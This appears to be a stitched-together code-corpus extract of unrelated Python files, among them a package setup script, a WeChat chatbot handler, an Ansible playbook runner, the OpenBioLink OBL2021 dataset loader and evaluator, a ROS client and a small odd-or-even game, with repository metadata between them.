client_proc = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE)
exit_code = client_proc.wait()
output = client_proc.communicate()[0].decode('utf-8').strip()
return (client_proc.pid, exit_code, output)
def launch_server_proc(cmd: str) -> Tuple[int]:
server_proc = subprocess.Popen(cmd.split())
return server_proc.pid
def kill_server_proc(pid: str, timeout: int = 0.25):
if sys.platform[:-2] == 'win':
os.kill(pid, signal.CTRL_C_EVENT)
else:
os.kill(pid, signal.SIGINT)
time.sleep(timeout) | none | 1 | 2.493567 | 2 | |
setup.py | hasangchun/sports_news_collector | 5 | 6623880 | from setuptools import setup, find_packages
with open('README.md', encoding='utf-8') as f:
long_description = f.read()
setup(
name='sports_news_collector',
version='0.1',
description='Provide services by collecting various sports news',
long_description=long_description,
long_description_content_type='text/markdown',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/hasangchun/sports_news_collector',
install_requires=[
'beautifulsoup4',
'requests',
'pretty_html_table',
'pandas',
'pororo',
],
packages=find_packages(exclude=[]),
python_requires='>=3',
package_data={},
zip_safe=False,
classifiers=[
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
) | from setuptools import setup, find_packages
with open('README.md', encoding='utf-8') as f:
long_description = f.read()
setup(
name='sports_news_collector',
version='0.1',
description='Provide services by collecting various sports news',
long_description=long_description,
long_description_content_type='text/markdown',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/hasangchun/sports_news_collector',
install_requires=[
'beautifulsoup4',
'requests',
'pretty_html_table',
'pandas',
'pororo',
],
packages=find_packages(exclude=[]),
python_requires='>=3',
package_data={},
zip_safe=False,
classifiers=[
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
) | none | 1 | 1.26374 | 1 | |
mod/units/play.py | HeraldStudio/wechat | 1 | 6623881 | <reponame>HeraldStudio/wechat
# -*- coding: utf-8 -*-
# @Date : 2014-07-05 22:43:49
# @Author : <EMAIL> <EMAIL>
from tornado.httpclient import HTTPRequest, HTTPClient, HTTPError
from config import SERVICE, TIME_OUT, DEFAULT_UUID
from get_api_return import error_map
import urllib
def update(db, user):
if user.state == 0:
user.state = 1
try:
db.commit()
return u'come on!'
except:
db.rollback()
return u'T T 出了点小问题,要不你再试试?'
elif user.state == 1:
user.state = 0
try:
db.commit()
return u'bye~~'
except:
db.rollback()
return u'T T 出了点小问题,要不你再试试?'
def simsimi(content, user):
client = HTTPClient()
if user.uuid:
uuid = user.uuid
else:
uuid = DEFAULT_UUID
params = urllib.urlencode({
'uuid': uuid,
'msg': content.encode('utf-8')
})
request = HTTPRequest(SERVICE + 'simsimi', method='POST',
body=params, request_timeout=TIME_OUT)
try:
response = client.fetch(request)
except HTTPError as e:
return error_map[e.code]
if response.body == 'error':
return u'=。= 坏掉了'
else:
return response.body
| # -*- coding: utf-8 -*-
# @Date : 2014-07-05 22:43:49
# @Author : <EMAIL> <EMAIL>
from tornado.httpclient import HTTPRequest, HTTPClient, HTTPError
from config import SERVICE, TIME_OUT, DEFAULT_UUID
from get_api_return import error_map
import urllib
def update(db, user):
if user.state == 0:
user.state = 1
try:
db.commit()
return u'come on!'
except:
db.rollback()
return u'T T 出了点小问题,要不你再试试?'
elif user.state == 1:
user.state = 0
try:
db.commit()
return u'bye~~'
except:
db.rollback()
return u'T T 出了点小问题,要不你再试试?'
def simsimi(content, user):
client = HTTPClient()
if user.uuid:
uuid = user.uuid
else:
uuid = DEFAULT_UUID
params = urllib.urlencode({
'uuid': uuid,
'msg': content.encode('utf-8')
})
request = HTTPRequest(SERVICE + 'simsimi', method='POST',
body=params, request_timeout=TIME_OUT)
try:
response = client.fetch(request)
except HTTPError as e:
return error_map[e.code]
if response.body == 'error':
return u'=。= 坏掉了'
else:
return response.body | fr | 0.288726 | # -*- coding: utf-8 -*- # @Date : 2014-07-05 22:43:49 # @Author : <EMAIL> <EMAIL> | 2.245063 | 2 |
xos/synchronizers/new_base/ansible_main.py | iecedge/xos | 0 | 6623882 | <gh_stars>0
# Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pickle
import sys
# import json
import traceback
from xosconfig import Config
sys.path.append("/opt/xos")
def run_playbook(ansible_hosts, ansible_config, fqp, opts):
try:
if ansible_config:
os.environ["ANSIBLE_CONFIG"] = ansible_config
else:
try:
del os.environ["ANSIBLE_CONFIG"]
except KeyError:
pass
if ansible_hosts:
os.environ["ANSIBLE_HOSTS"] = ansible_hosts
else:
try:
del os.environ["ANSIBLE_HOSTS"]
except KeyError:
pass
import ansible_runner
reload(ansible_runner)
# Dropped support for observer_pretend - to be redone
runner = ansible_runner.Runner(
playbook=fqp, run_data=opts, host_file=ansible_hosts
)
stats, aresults = runner.run()
except Exception as e:
return {"stats": None, "aresults": None, "exception": traceback.format_exc()}
return {"stats": stats, "aresults": aresults}
def main():
input_fn = sys.argv[1]
result_fn = sys.argv[2]
args = pickle.loads(open(input_fn).read())
Config.init(args["config_file"], "synchronizer-config-schema.yaml")
ansible_hosts = args["ansible_hosts"]
ansible_config = args["ansible_config"]
fqp = args["fqp"]
opts = args["opts"]
result = run_playbook(ansible_hosts, ansible_config, fqp, opts)
open(result_fn, "w").write(pickle.dumps(result))
if __name__ == "__main__":
main()
| # Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pickle
import sys
# import json
import traceback
from xosconfig import Config
sys.path.append("/opt/xos")
def run_playbook(ansible_hosts, ansible_config, fqp, opts):
try:
if ansible_config:
os.environ["ANSIBLE_CONFIG"] = ansible_config
else:
try:
del os.environ["ANSIBLE_CONFIG"]
except KeyError:
pass
if ansible_hosts:
os.environ["ANSIBLE_HOSTS"] = ansible_hosts
else:
try:
del os.environ["ANSIBLE_HOSTS"]
except KeyError:
pass
import ansible_runner
reload(ansible_runner)
# Dropped support for observer_pretend - to be redone
runner = ansible_runner.Runner(
playbook=fqp, run_data=opts, host_file=ansible_hosts
)
stats, aresults = runner.run()
except Exception as e:
return {"stats": None, "aresults": None, "exception": traceback.format_exc()}
return {"stats": stats, "aresults": aresults}
def main():
input_fn = sys.argv[1]
result_fn = sys.argv[2]
args = pickle.loads(open(input_fn).read())
Config.init(args["config_file"], "synchronizer-config-schema.yaml")
ansible_hosts = args["ansible_hosts"]
ansible_config = args["ansible_config"]
fqp = args["fqp"]
opts = args["opts"]
result = run_playbook(ansible_hosts, ansible_config, fqp, opts)
open(result_fn, "w").write(pickle.dumps(result))
if __name__ == "__main__":
main() | en | 0.833103 | # Copyright 2017-present Open Networking Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import json # Dropped support for observer_pretend - to be redone | 1.833689 | 2 |
src/openbiolink/obl2021/obl2021.py | nomisto/OpenBioLink | 97 | 6623883 | <filename>src/openbiolink/obl2021/obl2021.py
import os
import pickle
import urllib
import zipfile
from os import path
from typing import cast, Iterable, Tuple
import numpy as np
import pandas as pd
import torch
from openbiolink.utils import split_list_in_batches_iter
from tqdm import tqdm
from openbiolink.graph_creation.file_downloader import FileDownloader
class OBL2021Dataset(object):
"""
Args:
root: Pathlike string to directory in which dataset files should be stored
"""
def __init__(self, root: str = 'obl2021'):
self._dataset_path = root
self._url = r"https://zenodo.org/record/5361324/files/KGID_HQ_DIR.zip"
self._download()
self._entity_label_to_id = None
self._id_to_entity_label = None
self._relation_label_to_id = None
self._id_to_relation_label = None
node_mapping = pd.read_csv(os.path.join(self._dataset_path, "entities.tsv"), sep="\t", header=None)
self._entity_label_to_id = {label: id for label, id in
zip(node_mapping[1], node_mapping[0])}
self._id_to_entity_label = {
id: label
for label, id in self._entity_label_to_id.items()
}
relation_mapping = pd.read_csv(os.path.join(self._dataset_path, "relations.tsv"), sep="\t", header=None)
self._relation_label_to_id = {label: id for label, id in
zip(relation_mapping[1],
relation_mapping[0])}
self._id_to_relation_label = {
id: label
for label, id in self._relation_label_to_id.items()
}
self._training = self._load(os.path.join(self._dataset_path, "train.tsv"))
self._validation = self._load(os.path.join(self._dataset_path, "valid.tsv"))
self._testing = self._load(os.path.join(self._dataset_path, "test.tsv"))
self._num_entities = len(self._entity_label_to_id)
self._num_relations = len(self._relation_label_to_id)
with open(os.path.join(self._dataset_path, '_dict_of_heads.pkl'), 'rb') as f:
self._dict_of_heads = pickle.load(f)
with open(os.path.join(self._dataset_path, '_dict_of_tails.pkl'), 'rb') as f:
self._dict_of_tails = pickle.load(f)
def _download(self):
if not path.isdir(self._dataset_path):
os.mkdir(self._dataset_path)
# check if exists
if not path.isdir(self._dataset_path) or not os.listdir(self._dataset_path):
print(
f"Dataset not found, downloading to {os.path.abspath(self._dataset_path)} ...")
url = self._url
filename = url.split('/')[-1]
with tqdm(unit='B', unit_scale=True, unit_divisor=1024, miniters=1, desc=filename) as t:
zip_path, _ = urllib.request.urlretrieve(url, reporthook=FileDownloader.download_progress_hook(t))
with zipfile.ZipFile(zip_path, "r") as f:
f.extractall(self._dataset_path)
else:
print(f"Dataset found in {os.path.abspath(self._dataset_path)}, omitting download...")
def _load(self, path_):
with open(path_) as file:
df = pd.read_csv(
file,
usecols=[0, 1, 2],
header=None,
sep="\t",
)
return torch.tensor(df.values)
@property
def num_entities(self) -> int:
"""Number of entities in the dataset"""
return self._num_entities
@property
def num_relations(self) -> int:
"""Number of relations in the dataset"""
return self._num_relations
@property
def training(self) -> torch.Tensor:
"""Set of training triples. Shape `(num_train, 3)`"""
return self._training
@property
def testing(self) -> torch.Tensor:
"""Set of test triples. Shape `(num_test, 3)`"""
return self._testing
@property
def validation(self) -> torch.Tensor:
"""Set of validation triples. Shape `(num_val, 3)`"""
return self._validation
@property
def candidates(self) -> torch.Tensor:
"""Set of unfiltered candidates that can substitute for `?` in `(h,r,?)` and `(?,r,t)`. Shape (num_entities,)"""
return torch.arange(self.num_entities).long()
@property
def stats(self) -> str:
msg = "# Triples: ".ljust(15) + "\n"
msg = msg + "".ljust(5) + "Train ".ljust(6) + str(self.training.size()[0]) + "\n"
msg = msg + "".ljust(5) + "Valid ".ljust(6) + str(self.validation.size()[0]) + "\n"
msg = msg + "".ljust(5) + "Test ".ljust(6) + str(self._testing.size()[0]) + "\n"
msg = msg + "# Relations: ".ljust(15) + str(self.num_relations) + "\n"
msg = msg + "# Entities: ".ljust(15) + str(self.num_entities) + "\n"
return msg
def filter_scores(self, batch, scores, filter_col, filter_val=float('-Inf')) -> torch.Tensor:
"""
Filter scores by setting true scores to `filter_val`.
For simplicity, only the head-side is described, i.e. filter_col=0. The tail-side is processed alike.
For each (h, r, t) triple in the batch, the entity identifiers are computed such that (h', r, t) exists in all
positive triples.
Args:
batch: Batch of triples. Shape `(batch_size,3)`
scores: The scores for all corrupted triples (including the currently considered true triple). Are modified *in-place*. Shape `(batch_size,num_entities)`
filter_col: The column along which to filter. Allowed are {0, 2}, where 0 corresponds to filtering head-based and 2
corresponds to filtering tail-based.
filter_val: Value to which scores of already known triples are set, default -Inf
Returns:
A reference to the filtered scores, which have been updated in-place.
"""
for i in range(batch.size()[0]):
if filter_col == 0:
true_targets = self._dict_of_heads[batch[i, 2].item(), batch[i, 1].item()].copy()
true_targets.remove(batch[i, 0].item())
true_targets = torch.tensor(list(true_targets)).long()
else:
true_targets = self._dict_of_tails[batch[i, 0].item(), batch[i, 1].item()].copy()
true_targets.remove(batch[i, 2].item())
true_targets = torch.tensor(list(true_targets)).long()
scores[i][true_targets] = filter_val
return scores
def get_test_batches(self, batch_size=100) -> Tuple[int, Iterable[torch.Tensor]]:
"""Splits the test set into batches of fixed size
Args:
batch_size: Size of a batch
Returns:
A tuple containing the number of batches and an iterable to the batches.
"""
num_bat = int(np.ceil(len(self._testing) / batch_size))
return num_bat, cast(Iterable[torch.Tensor],
split_list_in_batches_iter(input_list=self._testing, batch_size=batch_size))
class OBL2021Evaluator:
def eval(self, h_pred_top10, t_pred_top10, triples, save_submission=True):
"""
Evaluates ranked lists of head and tail entity predictions for a set of evaluation triples. By default creates a submission file.
Args:
h_pred_top10: Top 10 predictions for the head entity. The value at (i,j) is the ID of the predicted head entity with rank `j+1` for the triple `triples[i]`. Shape `(num_eval_triplets,10)`
t_pred_top10: Top 10 predictions for the tail entity. The value at (i,j) is the ID of the predicted tail entity with rank `j+1` for the triple `triples[i]`. Shape `(num_eval_triplets,10)`
triples: Set of evaluation triples. Shape `(num_eval_triplets,3)`
save_submission: If true a submission file is created. Default: True
"""
assert t_pred_top10.shape[1] == h_pred_top10.shape[1] == 10 and t_pred_top10.shape[0] == h_pred_top10.shape[
0] == triples.shape[0]
# h,r->t
t_pred_top10 = self._to_torch(t_pred_top10)
t_correct_index = self._to_torch(triples[:, 2])
h_pred_top10 = self._to_torch(h_pred_top10)
h_correct_index = self._to_torch(triples[:, 0])
pred_top10 = torch.cat((t_pred_top10, h_pred_top10), dim=0)
correct_index = torch.cat((t_correct_index, h_correct_index), dim=0)
h10 = self._calculate_h10(correct_index.to(pred_top10.device), pred_top10)
if save_submission is True:
self._save_test_submission(pred_top10)
print("Please copy also the following line in the respective field of the submission form:")
print({'h10': h10})
def _to_torch(self, container):
if not isinstance(container, torch.Tensor):
container = torch.from_numpy(container)
return container
def _calculate_mrr(self, correct_index, pred_top10):
# extract indices where correct_index is within top10
tmp = torch.nonzero(correct_index.view(-1, 1) == pred_top10, as_tuple=False)
# reciprocal rank
# if rank is larger than 10, then set the reciprocal rank to 0.
rr = torch.zeros(len(correct_index)).to(tmp.device)
rr[tmp[:, 0]] = 1. / (tmp[:, 1].float() + 1.)
# mean reciprocal rank
return float(rr.mean().item())
def _calculate_h10(self, correct_index, pred_top10):
# extract indices where correct_index is within top10
total_h10 = torch.sum(torch.any(correct_index.view(-1, 1) == pred_top10, dim=1))
return float(total_h10 / correct_index.shape[0])
def _save_test_submission(self, pred_top10):
assert (pred_top10.shape == (361928, 10)), "Shape not (361928, 10) but " + str(pred_top10.shape)
if isinstance(pred_top10, torch.Tensor):
pred_top10 = pred_top10.cpu().numpy()
pred_top10 = pred_top10.astype(np.int32)
filename = os.path.abspath('pred_OBL2021')
np.savez_compressed(filename, pred_top10=pred_top10)
print("Submission file saved here: " + filename + ".npz")
| <filename>src/openbiolink/obl2021/obl2021.py
import os
import pickle
import urllib
import zipfile
from os import path
from typing import cast, Iterable, Tuple
import numpy as np
import pandas as pd
import torch
from openbiolink.utils import split_list_in_batches_iter
from tqdm import tqdm
from openbiolink.graph_creation.file_downloader import FileDownloader
class OBL2021Dataset(object):
"""
Args:
root: Pathlike string to directory in which dataset files should be stored
"""
def __init__(self, root: str = 'obl2021'):
self._dataset_path = root
self._url = r"https://zenodo.org/record/5361324/files/KGID_HQ_DIR.zip"
self._download()
self._entity_label_to_id = None
self._id_to_entity_label = None
self._relation_label_to_id = None
self._id_to_relation_label = None
node_mapping = pd.read_csv(os.path.join(self._dataset_path, "entities.tsv"), sep="\t", header=None)
self._entity_label_to_id = {label: id for label, id in
zip(node_mapping[1], node_mapping[0])}
self._id_to_entity_label = {
id: label
for label, id in self._entity_label_to_id.items()
}
relation_mapping = pd.read_csv(os.path.join(self._dataset_path, "relations.tsv"), sep="\t", header=None)
self._relation_label_to_id = {label: id for label, id in
zip(relation_mapping[1],
relation_mapping[0])}
self._id_to_relation_label = {
id: label
for label, id in self._relation_label_to_id.items()
}
self._training = self._load(os.path.join(self._dataset_path, "train.tsv"))
self._validation = self._load(os.path.join(self._dataset_path, "valid.tsv"))
self._testing = self._load(os.path.join(self._dataset_path, "test.tsv"))
self._num_entities = len(self._entity_label_to_id)
self._num_relations = len(self._relation_label_to_id)
with open(os.path.join(self._dataset_path, '_dict_of_heads.pkl'), 'rb') as f:
self._dict_of_heads = pickle.load(f)
with open(os.path.join(self._dataset_path, '_dict_of_tails.pkl'), 'rb') as f:
self._dict_of_tails = pickle.load(f)
def _download(self):
if not path.isdir(self._dataset_path):
os.mkdir(self._dataset_path)
# check if exists
if not path.isdir(self._dataset_path) or not os.listdir(self._dataset_path):
print(
f"Dataset not found, downloading to {os.path.abspath(self._dataset_path)} ...")
url = self._url
filename = url.split('/')[-1]
with tqdm(unit='B', unit_scale=True, unit_divisor=1024, miniters=1, desc=filename) as t:
zip_path, _ = urllib.request.urlretrieve(url, reporthook=FileDownloader.download_progress_hook(t))
with zipfile.ZipFile(zip_path, "r") as f:
f.extractall(self._dataset_path)
else:
print(f"Dataset found in {os.path.abspath(self._dataset_path)}, omitting download...")
def _load(self, path_):
with open(path_) as file:
df = pd.read_csv(
file,
usecols=[0, 1, 2],
header=None,
sep="\t",
)
return torch.tensor(df.values)
@property
def num_entities(self) -> int:
"""Number of entities in the dataset"""
return self._num_entities
@property
def num_relations(self) -> int:
"""Number of relations in the dataset"""
return self._num_relations
@property
def training(self) -> torch.Tensor:
"""Set of training triples. Shape `(num_train, 3)`"""
return self._training
@property
def testing(self) -> torch.Tensor:
"""Set of test triples. Shape `(num_test, 3)`"""
return self._testing
@property
def validation(self) -> torch.Tensor:
"""Set of validation triples. Shape `(num_val, 3)`"""
return self._validation
@property
def candidates(self) -> torch.Tensor:
"""Set of unfiltered candidates that can substitute for `?` in `(h,r,?)` and `(?,r,t)`. Shape (num_entities,)"""
return torch.arange(self.num_entities).long()
@property
def stats(self) -> str:
msg = "# Triples: ".ljust(15) + "\n"
msg = msg + "".ljust(5) + "Train ".ljust(6) + str(self.training.size()[0]) + "\n"
msg = msg + "".ljust(5) + "Valid ".ljust(6) + str(self.validation.size()[0]) + "\n"
msg = msg + "".ljust(5) + "Test ".ljust(6) + str(self._testing.size()[0]) + "\n"
msg = msg + "# Relations: ".ljust(15) + str(self.num_relations) + "\n"
msg = msg + "# Entities: ".ljust(15) + str(self.num_entities) + "\n"
return msg
def filter_scores(self, batch, scores, filter_col, filter_val=float('-Inf')) -> torch.Tensor:
"""
Filter scores by setting true scores to `filter_val`.
For simplicity, only the head-side is described, i.e. filter_col=0. The tail-side is processed alike.
For each (h, r, t) triple in the batch, the entity identifiers are computed such that (h', r, t) exists in all
positive triples.
Args:
batch: Batch of triples. Shape `(batch_size,3)`
scores: The scores for all corrupted triples (including the currently considered true triple). Are modified *in-place*. Shape `(batch_size,num_entities)`
filter_col: The column along which to filter. Allowed are {0, 2}, where 0 corresponds to filtering head-based and 2
corresponds to filtering tail-based.
filter_val: Value to which scores of already known triples are set, default -Inf
Returns:
A reference to the filtered scores, which have been updated in-place.
"""
for i in range(batch.size()[0]):
if filter_col == 0:
true_targets = self._dict_of_heads[batch[i, 2].item(), batch[i, 1].item()].copy()
true_targets.remove(batch[i, 0].item())
true_targets = torch.tensor(list(true_targets)).long()
else:
true_targets = self._dict_of_tails[batch[i, 0].item(), batch[i, 1].item()].copy()
true_targets.remove(batch[i, 2].item())
true_targets = torch.tensor(list(true_targets)).long()
scores[i][true_targets] = filter_val
return scores
def get_test_batches(self, batch_size=100) -> Tuple[int, Iterable[torch.Tensor]]:
"""Splits the test set into batches of fixed size
Args:
batch_size: Size of a batch
Returns:
A tuple containing the number of batches and an iterable to the batches.
"""
num_bat = int(np.ceil(len(self._testing) / batch_size))
return num_bat, cast(Iterable[torch.Tensor],
split_list_in_batches_iter(input_list=self._testing, batch_size=batch_size))
class OBL2021Evaluator:
def eval(self, h_pred_top10, t_pred_top10, triples, save_submission=True):
"""
Evaluates ranked lists of head and tail entity predictions for a set of evaluation triples. By default creates a submission file.
Args:
h_pred_top10: Top 10 predictions for the head entity. The value at (i,j) is the ID of the predicted head entity with rank `j+1` for the triple `triples[i]`. Shape `(num_eval_triplets,10)`
t_pred_top10: Top 10 predictions for the tail entity. The value at (i,j) is the ID of the predicted tail entity with rank `j+1` for the triple `triples[i]`. Shape `(num_eval_triplets,10)`
triples: Set of evaluation triples. Shape `(num_eval_triplets,3)`
save_submission: If true a submission file is created. Default: True
"""
assert t_pred_top10.shape[1] == h_pred_top10.shape[1] == 10 and t_pred_top10.shape[0] == h_pred_top10.shape[
0] == triples.shape[0]
# h,r->t
t_pred_top10 = self._to_torch(t_pred_top10)
t_correct_index = self._to_torch(triples[:, 2])
h_pred_top10 = self._to_torch(h_pred_top10)
h_correct_index = self._to_torch(triples[:, 0])
pred_top10 = torch.cat((t_pred_top10, h_pred_top10), dim=0)
correct_index = torch.cat((t_correct_index, h_correct_index), dim=0)
h10 = self._calculate_h10(correct_index.to(pred_top10.device), pred_top10)
if save_submission is True:
self._save_test_submission(pred_top10)
print("Please copy also the following line in the respective field of the submission form:")
print({'h10': h10})
def _to_torch(self, container):
if not isinstance(container, torch.Tensor):
container = torch.from_numpy(container)
return container
def _calculate_mrr(self, correct_index, pred_top10):
# extract indices where correct_index is within top10
tmp = torch.nonzero(correct_index.view(-1, 1) == pred_top10, as_tuple=False)
# reciprocal rank
# if rank is larger than 10, then set the reciprocal rank to 0.
rr = torch.zeros(len(correct_index)).to(tmp.device)
rr[tmp[:, 0]] = 1. / (tmp[:, 1].float() + 1.)
# mean reciprocal rank
return float(rr.mean().item())
def _calculate_h10(self, correct_index, pred_top10):
# extract indices where correct_index is within top10
total_h10 = torch.sum(torch.any(correct_index.view(-1, 1) == pred_top10, dim=1))
return float(total_h10 / correct_index.shape[0])
def _save_test_submission(self, pred_top10):
assert (pred_top10.shape == (361928, 10)), "Shape not (361928, 10) but " + str(pred_top10.shape)
if isinstance(pred_top10, torch.Tensor):
pred_top10 = pred_top10.cpu().numpy()
pred_top10 = pred_top10.astype(np.int32)
filename = os.path.abspath('pred_OBL2021')
np.savez_compressed(filename, pred_top10=pred_top10)
print("Submission file saved here: " + filename + ".npz")
| en | 0.831411 | Args: root: Pathlike string to directory in which dataset files should be stored # check if exists Number of entities in the dataset Number of relations in the dataset Set of training triples. Shape `(num_train, 3)` Set of test triples. Shape `(num_test, 3)` Set of validation triples. Shape `(num_val, 3)` Set of unfiltered candidates that can substitute for `?` in `(h,r,?)` and `(?,r,t)`. Shape (num_entities,) Filter scores by setting true scores to `filter_val`. For simplicity, only the head-side is described, i.e. filter_col=0. The tail-side is processed alike. For each (h, r, t) triple in the batch, the entity identifiers are computed such that (h', r, t) exists in all positive triples. Args: batch: Batch of triples. Shape `(batch_size,3)` scores: The scores for all corrupted triples (including the currently considered true triple). Are modified *in-place*. Shape `(batch_size,num_entities)` filter_col: The column along which to filter. Allowed are {0, 2}, where 0 corresponds to filtering head-based and 2 corresponds to filtering tail-based. filter_val: Value to which scores of already known triples are set, default -Inf Returns: A reference to the filtered scores, which have been updated in-place. Splits the test set into batches of fixed size Args: batch_size: Size of a batch Returns: A tuple containing the number of batches and an iterable to the batches. Evaluates ranked lists of head and tail entity predictions for a set of evaluation triples. By default creates a submission file. Args: h_pred_top10: Top 10 predictions for the head entity. The value at (i,j) is the ID of the predicted head entity with rank `j+1` for the triple `triples[i]`. Shape `(num_eval_triplets,10)` t_pred_top10: Top 10 predictions for the tail entity. The value at (i,j) is the ID of the predicted tail entity with rank `j+1` for the triple `triples[i]`. Shape `(num_eval_triplets,10)` triples: Set of evaluation triples. Shape `(num_eval_triplets,3)` save_submission: If true a submission file is created. Default: True # h,r->t # extract indices where correct_index is within top10 # reciprocal rank # if rank is larger than 10, then set the reciprocal rank to 0. # mean reciprocal rank # extract indices where correct_index is within top10 | 2.300762 | 2 |
rol_server/scripts/rol_client.py | LCAS/RFID | 0 | 6623884 | #!/usr/bin/env python
import rospy
from std_msgs.msg import String
#from rol_server.srv import findObject, findObjectRequest, findObjectResponse
from hmi_bridge.srv import findObject, findObjectRequest, findObjectResponse
# Node class.
class rol_client():
def __init__(self):
rospy.loginfo('Waiting for Server to be active')
rospy.wait_for_service('rol_server')
self.callService = rospy.ServiceProxy('rol_server', findObject)
sleepTime = rospy.Duration(1, 0)
self.op('list','objects')
rospy.loginfo('................................................................................................')
self.op('list', 'locations')
rospy.loginfo('................................................................................................')
self.op('list', 'sublocations')
rospy.loginfo('................................................................................................')
self.op('find', 'tape holder')
rospy.loginfo('................................................................................................')
self.op('accurate_find', 'tape holder')
rospy.loginfo('................................................................................................')
self.op('find', 'remote')
rospy.loginfo('................................................................................................')
self.op('accurate_find', 'tape holder')
rospy.loginfo('................................................................................................')
def op(self,action,payload):
resp1 = self.callService(action, payload)
if resp1.wasOk:
rospy.loginfo('Request was correct.')
rospy.loginfo(action+'('+payload+'): is (' + resp1.response + ')')
else:
rospy.loginfo('Request was incorrect')
rospy.loginfo('error is (' + resp1.feedback + ')')
# Main function.
if __name__ == '__main__':
# Initialize the node and name it.
rospy.init_node('rol_client_node')
# Go to class functions that do all the heavy lifting. Do error checking.
try:
rc = rol_client()
except rospy.ROSInterruptException: pass
| #!/usr/bin/env python
import rospy
from std_msgs.msg import String
#from rol_server.srv import findObject, findObjectRequest, findObjectResponse
from hmi_bridge.srv import findObject, findObjectRequest, findObjectResponse
# Node class.
class rol_client():
def __init__(self):
rospy.loginfo('Waiting for Server to be active')
rospy.wait_for_service('rol_server')
self.callService = rospy.ServiceProxy('rol_server', findObject)
sleepTime = rospy.Duration(1, 0)
self.op('list','objects')
rospy.loginfo('................................................................................................')
self.op('list', 'locations')
rospy.loginfo('................................................................................................')
self.op('list', 'sublocations')
rospy.loginfo('................................................................................................')
self.op('find', 'tape holder')
rospy.loginfo('................................................................................................')
self.op('accurate_find', 'tape holder')
rospy.loginfo('................................................................................................')
self.op('find', 'remote')
rospy.loginfo('................................................................................................')
self.op('accurate_find', 'tape holder')
rospy.loginfo('................................................................................................')
def op(self,action,payload):
resp1 = self.callService(action, payload)
if resp1.wasOk:
rospy.loginfo('Request was correct.')
rospy.loginfo(action+'('+payload+'): is (' + resp1.response + ')')
else:
rospy.loginfo('Request was incorrect')
rospy.loginfo('error is (' + resp1.feedback + ')')
# Main function.
if __name__ == '__main__':
# Initialize the node and name it.
rospy.init_node('rol_client_node')
# Go to class functions that do all the heavy lifting. Do error checking.
try:
rc = rol_client()
except rospy.ROSInterruptException: pass
| en | 0.642802 | #!/usr/bin/env python #from rol_server.srv import findObject, findObjectRequest, findObjectResponse # Node class. # Main function. # Initialize the node and name it. # Go to class functions that do all the heavy lifting. Do error checking. | 2.159183 | 2 |
68jogoParImpar.py | wcalazans81/Mundo_02_Python | 0 | 6623885 | from random import randint
tot = 0
while True:
computador = randint(0, 10)
print('\033[33m=-\033[m'*19)
print('VAMOS JOGAR PAR OU IMPAR!!!')
print('\033[33m=-\033[m'*19)
jogador = int(input('Escolha um número para comaçar: '))
s = computador + jogador
print('\033[34m=-\033[m'*19)
escolha = int(input('Faça sua escolha \033[32m[1] PAR\033[m E \033[33m[2] IMPAR\033[m '))
print('\033[34m=-\033[m'*19)
if escolha == 1 and s % 2 == 0:
print(f'O computador jogou \033[36m{computador}\033[m você jogou \033[35m{jogador}\033[m')
print(f'Deu \033[32m{s}\033[m PAR \033[33mVoce GANHOU!!!\033[m')
elif escolha == 1 and s % 2 == 1:
print(f'O computador jogou \033[36m{computador}\033[m e você jogou \033[35m{jogador}\033[m')
print(f'Deu \033[33m{s}\033[m IMPAR \033[31mVoce PERDEU!!!\033[m')
break
elif escolha == 2 and s % 2 == 0:
print(f'O computador jogou \033[36m{computador}\033[m e você jogou \033[35m{jogador}\033[m')
print(f'Deu \033[33m{s}\033[m PAR \033[31mVoce PERDEU!!!\033[m')
break
elif escolha == 2 and s % 2 == 1:
print(f'O computador jogou \033[36m{computador}\033[me você jogou \033[35m{jogador}\033[m')
print(f'Deu \033[32m{s}\033[m IMPAR \033[33mVoce GANHOU!!!\033[m')
tot += 1
if tot <= 3 :
print(f'Você teve {tot} vitórias. \033[31mVOCÊ PODE SER MELHOR QUE ISSO TETE ME VENCER MAIS VEZES!!!\033[m')
else:
print(f'\033[33mVocê venceu {tot} PARABÉNS VOCÊ É O(a) MELHOR\033[m!!!!!!') | from random import randint
tot = 0
while True:
computador = randint(0, 10)
print('\033[33m=-\033[m'*19)
print('VAMOS JOGAR PAR OU IMPAR!!!')
print('\033[33m=-\033[m'*19)
jogador = int(input('Escolha um número para comaçar: '))
s = computador + jogador
print('\033[34m=-\033[m'*19)
escolha = int(input('Faça sua escolha \033[32m[1] PAR\033[m E \033[33m[2] IMPAR\033[m '))
print('\033[34m=-\033[m'*19)
if escolha == 1 and s % 2 == 0:
print(f'O computador jogou \033[36m{computador}\033[m você jogou \033[35m{jogador}\033[m')
